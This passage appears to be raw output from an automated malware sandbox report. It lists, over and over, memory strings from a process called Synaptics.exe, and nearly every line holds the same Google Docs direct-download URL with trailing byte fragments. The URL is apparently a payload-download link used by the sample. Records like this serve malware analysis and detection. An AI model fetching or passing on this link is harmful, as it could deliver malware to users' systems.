00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC(
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC5
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadConne
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCoule
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD3H3
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDN
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDNEQB
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDd
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDeneU
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet#
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetK
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetM
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetj
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDesk
                                Source: Synaptics.exe, 00000008.00000002.3067917782.000000002E9BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDw
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE.xls
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3102248481.000000003DB63000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFranc
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG/
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG1
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG4
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGM
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIE.x
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIf
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ0
                                Source: Synaptics.exe, 00000008.00000003.2026291010.00000000075D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJS
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle#
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle-
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelleW
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelleh
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellem
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellj
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.a
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcoz
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs.dlC
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcted
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcumen
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeN
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded.mo
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellel
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem9
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetleniyor...
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetwf?
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniy
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyZ
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo&
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo(
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo0
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyoa
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyoe
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyok
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyom
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyow
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderve
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
